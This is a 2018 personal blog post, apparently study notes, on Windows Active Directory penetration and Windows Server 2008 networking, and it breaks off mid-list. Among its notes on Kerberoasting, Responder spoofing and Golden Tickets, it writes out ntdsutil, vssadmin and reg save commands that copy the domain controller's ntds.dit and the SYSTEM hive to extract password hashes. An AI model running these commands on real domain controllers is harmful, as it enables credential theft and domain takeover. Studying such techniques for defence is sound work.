<!DOCTYPE html>









<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en"
  
>

  <!-- The Head -->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  >

  
    

    
  

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="Permeation Skills" />
<meta property="og:locale" content="en" />
<meta name="description" content="permeation skills in windows opearetion system" />
<meta property="og:description" content="permeation skills in windows opearetion system" />
<link rel="canonical" href="http://c0ldstudy.github.io/posts/Permeation_Skills/" />
<meta property="og:url" content="http://c0ldstudy.github.io/posts/Permeation_Skills/" />
<meta property="og:site_name" content="c0ldstudy" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-09-22T00:00:00-07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Permeation Skills" />
<meta name="twitter:site" content="@JiacenXu" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2018-09-22T00:00:00-07:00","datePublished":"2018-09-22T00:00:00-07:00","description":"permeation skills in windows opearetion system","headline":"Permeation Skills","mainEntityOfPage":{"@type":"WebPage","@id":"http://c0ldstudy.github.io/posts/Permeation_Skills/"},"url":"http://c0ldstudy.github.io/posts/Permeation_Skills/"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>Permeation Skills | c0ldstudy
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="c0ldstudy">
<meta name="application-name" content="c0ldstudy">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">
  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.2.1/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.20.1/dist/tocbot.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.1/dist/jquery.min.js"></script>

  
    <!--
  Switch the mode between dark and light.
-->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get MODE_ATTR() { return "data-mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }
    static get ID() { return "mode-toggle"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener('change', () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }
          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();
      });
    } /* constructor() */

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage({
        direction: ModeToggle.ID,
        message: this.modeStatus
      }, "*");
    }

    flipMode() {
      if (this.hasMode) {
        if (this.isSysDarkPrefer) {
          if (this.isLightMode) {
            this.clearMode();
          } else {
            this.setLight();
          }
        } else {
          if (this.isDarkMode) {
            this.clearMode();
          } else {
            this.setDark();
          }
        }
      } else {
        if (this.isSysDarkPrefer) {
          this.setLight();
        } else {
          this.setDark();
        }
      }

      this.notify();
    } /* flipMode() */
  } /* ModeToggle */

  const modeToggle = new ModeToggle();
</script>

  
</head>


  <body data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" class="mx-auto">
        
          
          <img src="/commons/avatar.png" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title">
      <a href="/">c0ldstudy</a>
    </div>
    <div class="site-subtitle font-italic">Absorb what is useful. Reject what is useless. And add what is essentially your own. --- Bruce Lee</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    
      <button class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
      <a href="https://github.com/c0ldstudy" aria-label="github"
        

        
          target="_blank"
          
        

        

        rel="noopener noreferrer">

        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/JiacenXu" aria-label="twitter"
        

        
          target="_blank"
          
        

        

        rel="noopener noreferrer">

        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="javascript:location.href = 'mailto:' + ['jiacenx','uci.edu'].join('@')" aria-label="email"
        

        

        

        >

        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        

        

        

        >

        <i class="fas fa-rss"></i>
      </a>
      

    
      

      
      <a href="https://www.linkedin.com/in/jiacen-xu-021536105/" aria-label="linkedin"
        

        
          target="_blank"
          
        

        

        rel="noopener noreferrer">

        <i class="fab fa-linkedin"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper">
  <div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>Permeation Skills</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div id="main" class="container pl-xl-4 pr-xl-4">
        





<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4">
    <div class="post pl-1 pr-1 pl-md-2 pr-md-2">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->


<!-- images -->





<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  




<!-- return -->

<h1 data-toc-skip>Permeation Skills</h1>

<div class="post-meta text-muted">
    <!-- published date -->
    <span>
      Posted
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1537599600"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Sep 22, 2018
</em>

    </span>

    <!-- lastmod date -->
    

  

  <div class="d-flex justify-content-between">
    <!-- author(s) -->
    <span>
      

      By

      <em>
      
        <a href="https://twitter.com/JiacenXu">Jiacen (Jason) Xu</a>
      
      </em>
    </span>

    <div>
      <!-- page views -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="3315 words">
  <em>18 min</em> read</span>

    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <h3 id="basic-knowledge"><span class="mr-2">Basic Knowledge</span><a href="#basic-knowledge" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>Active Directory Domain Services is Microsoft’s Directory Server. It provides authentication and authorization mechanisms as well as a framework within which other related services can be deployed (AD Certificate Services, AD Federated Services, etc).</li>
  <li>COM</li>
</ol>

<h3 id="lan-information-collection"><span class="mr-2">LAN Information Collection</span><a href="#lan-information-collection" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>
    <p><a href="https://docs.microsoft.com/en-us/windows/desktop/wmisdk/wmic">WMIC</a>(Windows Management Instructure Commands): WMI provides users with information about the status of local or remote computer systems and supports. It contains aliases, verbs, switches, and commands.</p>

    <ul>
      <li><code class="language-plaintext highlighter-rouge">net config workstation</code>: Search for the local machine’s domain</li>
    </ul>
  </li>
  <li>
    <p>nltest: NLTEST.EXE is a very powerful command-line utility that can be used to test Trust relationships and the state of Domain Controller replication in a Microsoft Windows NT Domain.</p>
  </li>
</ol>

<h3 id="password-acquirement"><span class="mr-2">Password Acquirement</span><a href="#password-acquirement" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<ol>
  <li>Brute Force Tools:
    <ul>
      <li>SMBCrack2(2005)</li>
      <li>Hydra</li>
    </ul>
  </li>
  <li>Mimikatz: require the administrator privilege</li>
</ol>

<h3 id="kerberoast-attack"><span class="mr-2">Kerberoast Attack</span><a href="#kerberoast-attack" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>Kerberroast Attack</li>
</ol>

<h3 id="mitm"><span class="mr-2">MITM</span><a href="#mitm" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>LLMNR/NBNS欺骗 + WPAD协议
Tools: Responder</p>

<h3 id="domain-management-privilege-maintainning"><span class="mr-2">Domain Management Privilege Maintainning</span><a href="#domain-management-privilege-maintainning" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>Golden Ticket</li>
  <li>Silver Ticket</li>
</ol>

<h3 id="tutorial-start-up-a-active-directory"><span class="mr-2">Tutorial: Start-up a active directory</span><a href="#tutorial-start-up-a-active-directory" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>run <code class="language-plaintext highlighter-rouge">dcpromo</code></li>
  <li>set password and other procedures</li>
</ul>

<hr />

<h2 id="windows-server-2008-组网技术与应用详解"><span class="mr-2">Windows Server 2008 组网技术与应用详解</span><a href="#windows-server-2008-组网技术与应用详解" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="1-活动目录域服务"><span class="mr-2">1. 活动目录域服务</span><a href="#1-活动目录域服务" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<h4 id="11-ad域服务"><span class="mr-2">1.1 AD域服务</span><a href="#11-ad域服务" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>AD域服务用于本地网络活动目标的管理，包含：</p>

<ul>
  <li>只读型域控制器 RODC</li>
  <li>RMS(权限管理服务)</li>
  <li>联合身份验证服务</li>
  <li>轻型目录服务器</li>
  <li>证书服务</li>
</ul>

<p>活动目录负责目录数据库（即C:\windows\ntds\ntds.dit）的操作，方便用户找寻数据。活动目录存储在域控制器中。每个域有一个或多个域控制器（同一个域内每个控制器中的活动目录相同），分担工作和任务。域控制器管理所有网络访问。活动目录可以包含一个或多个域（域林）。</p>

<h4 id="12-结构"><span class="mr-2">1.2 结构</span><a href="#12-结构" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>1.2.1 逻辑结构：</p>

<ul>
  <li>域</li>
  <li>组织单元：容器对象，局限于域的内部</li>
  <li>域树：连续命名空间的层次结构</li>
  <li>域林：不共享连续命名空间的域树组成</li>
</ul>

<p>1.2.2 物理结构</p>

<ul>
  <li>站点</li>
  <li>域控制器：多主机复制，但仍需指定全局目录服务器</li>
</ul>

<p>1.2.3 额外域、子域与信任关系</p>

<ul>
  <li>额外域控制器：主域控制器的备份和辅助</li>
  <li>信任关系：
    <ul>
      <li>可传递信任、
        <ul>
          <li>快捷信任</li>
          <li>林信任</li>
          <li>领域信任</li>
        </ul>
      </li>
      <li>非可传递信任</li>
    </ul>
  </li>
</ul>

<h3 id="2-用户与组策略"><span class="mr-2">2. 用户与组策略</span><a href="#2-用户与组策略" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="21-用户与组管理"><span class="mr-2">2.1 用户与组管理</span><a href="#21-用户与组管理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<ul>
  <li>用户组
    <ul>
      <li>系统默认组</li>
      <li>新组</li>
    </ul>
  </li>
  <li>组织单元</li>
  <li>配置文件</li>
</ul>

<h4 id="22-组策略和应用"><span class="mr-2">2.2 组策略和应用</span><a href="#22-组策略和应用" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>介于控制面板和注册表之间的修改系统、设置程序的工具。</p>

<ul>
  <li>组策略对象组件 GPO
    <ul>
      <li>组策略容器组件 GPC</li>
      <li>组策略模板组件 GPT</li>
    </ul>
  </li>
  <li>客户端拓展组件 CSE</li>
  <li>组策略编辑器组件 GPE</li>
  <li>计算机策略和用户策略组件</li>
  <li>组策略和本地策略组件</li>
</ul>

<h3 id="3-dhcp服务与dns服务"><span class="mr-2">3. DHCP服务与DNS服务</span><a href="#3-dhcp服务与dns服务" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>3.1 概念动态主机分配协议，方便客户端批量自动获取IP地址，其租借过程如下：</p>

<ul>
  <li>客户端以0.0.0.0作为自己的IP地址，255.255.255.255作为DHCP服务器地址，广播DHCP发现信息，包含网卡Mac地址和NetBIOS名称。</li>
  <li>每隔一段时间发送一次直到收到回复，或者自动选定保留IP地址段的一个，保证没有DHCP服务器网络仍能运行。</li>
  <li>客户单收到第一个请求后以广播方式告知所有服务器。</li>
</ul>

<p>3.2 在服务器中，以IP作用域作为基本管理单位。IP作用域就是网络中可管理的IP地址分组。超级作用域是DHCP服务器上有多个作用域，用于多网配置。</p>

<p>3.3 DHCP中继代理：将请求发送到远端的DHCP服务器上。</p>

<p>3.4 域名系统，实现名称与IP地址的转换，主要包括：</p>

<ul>
  <li>DNS域命名空间</li>
  <li>资源记录</li>
  <li>服务器</li>
  <li>客户端</li>
</ul>

<p>3.5 查询模式：递归查询、迭代查询、反向查询</p>

<h3 id="4-文件服务与证书服务"><span class="mr-2">4. 文件服务与证书服务</span><a href="#4-文件服务与证书服务" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>4.1 通过文件服务器，设置共享文件夹，并给予不同用户不同的权限。另外，可以使用资源管理器实现文件共享；通过脱机设置实现离线访问共享资源。</p>

<p>4.2 资源访问权限的控制：NTFS。NTFS是从Windows NT开始引入的文件系统，可以为文件夹和文件授权，支持数据压缩和磁盘限额，但不适用与FAT或FAT32文件系统</p>

<p>4.3 磁盘配额：以文件所有权为基础，只应用于卷并监视个人用户卷的使用情况。</p>

<p>4.4 分布式文件系统 DFS：为所有共享文件提供访问点和逻辑树结构，保证服务稳定。</p>

<ul>
  <li>独立的根目录分布式文件系统：目录信息存储在本地主服务器上。没有根级别的容错，即根不可达则整个空间不可访问。</li>
  <li>域分布式文件系统：拓扑信息存储在活动目录AD中。</li>
</ul>

<p>4.5 数字证书是由证书颁发机构（Certification Authority）数字签名的、包含用户身份信息和用户公钥信息以及身份验证机构数字签名的数据。</p>
<ul>
  <li>身份验证机构的数字签名确保信息真实性</li>
  <li>用户公钥信息确保完整性</li>
  <li>用户数字签名确保不可否认性</li>
</ul>

<p><strong><em>注意：</em></strong>Windows 2008使用公共密钥基础结构（Public Key Infrastructure），即非对称加密技术。
注意，部署了证书服务器后，服务器的计算机名和域名不能更改，但可以更改IP地址。</p>

<h3 id="5-活动目录权限管理服务ad-right-management-services"><span class="mr-2">5. 活动目录权限管理服务（AD Right Management Services）</span><a href="#5-活动目录权限管理服务ad-right-management-services" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>相关组件：应用程序、服务器、客户端</p>

<h4 id="51-权限管理账号证书生成过程"><span class="mr-2">5.1 权限管理账号证书生成过程：</span><a href="#51-权限管理账号证书生成过程" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<ol>
  <li>用户第一次使用加密文档之前，需要域用户身份向AD RMS服务器发送请求，获取证书。</li>
  <li>服务器数据库，若密钥已经存在则使用该密钥，否则新建。</li>
  <li>服务器将用户密钥中私钥用服务器的私钥加密，并将公钥和加密了的私钥放到权限管理账户证书中。</li>
  <li>权限管理账户证书被服务器用私钥签名，并发送给用户。</li>
  <li>服务器将用户的密钥对存储到AD RMS数据库中。</li>
</ol>

<h4 id="52-ad-rms实现原理"><span class="mr-2">5.2 AD RMS实现原理</span><a href="#52-ad-rms实现原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>5.1.1 服务的发现
5.1.2 文档在线发布过程
5.1.3 文档离线发布过程
5.1.4 受保护文档使用过程</p>

<h3 id="服务器虚拟化hyper-v"><span class="mr-2">服务器虚拟化（Hyper-V）</span><a href="#服务器虚拟化hyper-v" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>与虚拟机不同，Hyper-V管理的虚拟机直接运行在底层，相当于独立的计算机。</p>

<h3 id="网络访问保护network-access-protection"><span class="mr-2">网络访问保护（Network Access Protection）</span><a href="#网络访问保护network-access-protection" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>检查联入内网的电脑是否安全，分为4个部分：</p>
<ul>
  <li>策略验证</li>
  <li>隔离</li>
  <li>补救</li>
  <li>持续监控</li>
</ul>

<h3 id="防火墙"><span class="mr-2">防火墙</span><a href="#防火墙" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>IPSec从Windows Server 2003开始使用，位于网络层，可以防止中间人攻击、探测攻击、重放攻击、未认证的网络应用程序访问、只适用IP地址认证的网络应用程序的访问。IPSec有两种模式：传输模式和通道模式。IPSec使用两种协议：AH和ESP。</p>

<p>Internet密钥交换协议（IKE）：Internet安全关联和密钥管理协议（ISAKMP）和Oakley金钥交换协议的组合，分为3个模式：主模式、快速模式和用户模式。</p>

<hr />

<h2 id="ata90-days-free-trial"><span class="mr-2">ATA[90 days free trial]</span><a href="#ata90-days-free-trial" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The Advanced Threat Analytics is a platform to protect the system from cyber attacks. The informatino collected by ATA via:</p>

<ul>
  <li>Port mirroring from DC and DNS server to the ATA gateway</li>
  <li>Deploy gateway on Domian Controller</li>
</ul>

<p>ATA receives events and log from:</p>

<ul>
  <li>SIEM intergration</li>
  <li>Windows Event Forwarding</li>
</ul>

<p>ATA detects suspicious activities:</p>

<ul>
  <li>Reconnaissance</li>
  <li>Lateral movement cycle</li>
  <li>Domain dominance (persistence)</li>
</ul>

<p>which including:</p>

<ul>
  <li>Pass-the-Ticket (PtT)</li>
  <li>Pass-the-Hash (PtH)</li>
  <li>Overpass-the-Hash</li>
  <li>Forged PAC (MS14-068)</li>
  <li>Golden Ticket</li>
  <li>Malicious replications</li>
  <li>Reconnaissance</li>
  <li>Brute Force</li>
  <li>Remote execution</li>
</ul>

<hr />

<h2 id="三好学生域渗透文章复现与总结"><span class="mr-2">三好学生域渗透文章复现与总结</span><a href="#三好学生域渗透文章复现与总结" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="1-域渗透获得域控服务器的ntdsdit文件"><span class="mr-2">1. 域渗透——获得域控服务器的NTDS.dit文件</span><a href="#1-域渗透获得域控服务器的ntdsdit文件" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="11-通过vss服务下的命令获得域控服务器ntdsdit文件"><span class="mr-2">1.1 <a href="https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84NTDS.dit%E6%96%87%E4%BB%B6/">通过VSS服务下的命令获得域控服务器NTDS.dit文件</a></span><a href="#11-通过vss服务下的命令获得域控服务器ntdsdit文件" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p><strong>Concepts</strong>：Volume Shadow Copy Service <em>(Volume Snapshot Service)</em> used in manual or automatic backup copies even when they are in use. It contains a set of COM interfaces that implements a framework to allow volume backups to be performed while applications on a system continue to write to the volumes.</p>

<p>支持Windows 2003以上操作系统</p>

<p>1.1.1 使用ntdsutil实现从snapshot中得到ntds.dit</p>

<p>支持Windows 2003以上的系统</p>

<ul>
  <li>create snapshot：<code class="language-plaintext highlighter-rouge">ntdsutil snapshot "activate instance ntds" create quit quit</code></li>
  <li>load the snapshot: <code class="language-plaintext highlighter-rouge">ntdsutil snapshot "mount {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit</code></li>
  <li>copy ntds.dit: <code class="language-plaintext highlighter-rouge">copy C:\$SNAP_201810291848_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit</code></li>
  <li>unload the snapshot: <code class="language-plaintext highlighter-rouge">ntdsutil snapshot  "unmount {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit</code></li>
  <li>delete the snapshot: <code class="language-plaintext highlighter-rouge">ntdsutil snapshot  "delete {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit</code></li>
</ul>

<p>注意：使用VSS服务会产生日志，ID为7036。create snapshot会产生日志ID为7036(实际测试时并未发现)。</p>

<p>1.1.2 vssadmin</p>

<p>支持windows 2008以上系统</p>

<ul>
  <li>search current existing shadow: <code class="language-plaintext highlighter-rouge">vssadmin list shadows</code></li>
  <li>create the shadow: <code class="language-plaintext highlighter-rouge">vssadmin create shadow /for=c:</code></li>
  <li>copy ntds.dit: <code class="language-plaintext highlighter-rouge">copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit</code></li>
  <li>delete the shadow: <code class="language-plaintext highlighter-rouge">vssadmin delete shadows /for=c: /quiet</code></li>
</ul>

<p>1.1.3 <a href="https://docs.microsoft.com/en-us/windows/desktop/VSS/vshadow-tool-and-sample">vshadow.exe</a></p>

<p>系统默认未安装，需要在Microsoft Windows Software Development Kit (SDK)中获取。vshadow.exe包含微软签名，能绕过某些白名单的限制。
如果作为启动项，Autoruns的默认启动列表不显示。</p>

<p><a href="https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/">Tutorial</a></p>

<p>1.1.4 <a href="https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs">vssown.vbs</a></p>

<p>通过wmi对Shadowcopy进行控制，nishang里有<a href="https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1">powershell版本</a></p>

<h4 id="12-通过ninjacopy获得域控服务器ntdsdit文件"><span class="mr-2">1.2 <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1">通过NinjaCopy获得域控服务器NTDS.dit文件</a></span><a href="#12-通过ninjacopy获得域控服务器ntdsdit文件" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>powershell 运行脚本失败，语法错误，待研究。</p>

<h4 id="13-如何从ntdsdit文件中获取关键信息"><span class="mr-2">1.3 <a href="https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/">如何从NTDS.dit文件中获取关键信息</a></span><a href="#13-如何从ntdsdit文件中获取关键信息" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<h5 id="131-获取各个用户的ntlm的hash值"><span class="mr-2">1.3.1 获取各个用户的NTLM的hash值</span><a href="#131-获取各个用户的ntlm的hash值" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<p>首先，需要利用system hive文件破解ntds.dit文件，使用注册表编辑器直接导出的reg文件无法用于破解，需要二进制格式的system hive文件。获取方法如下：</p>

<ul>
  <li>Step 1: 获取system hive文件
    <blockquote>
      <p>reg export HKLM\System system.reg
reg save HKLM\System system.hiv
The first one can be opened using any text editor; the latter is a full binary dump, and can be opened by loading it in REGEDIT.</p>
    </blockquote>
  </li>
  <li>
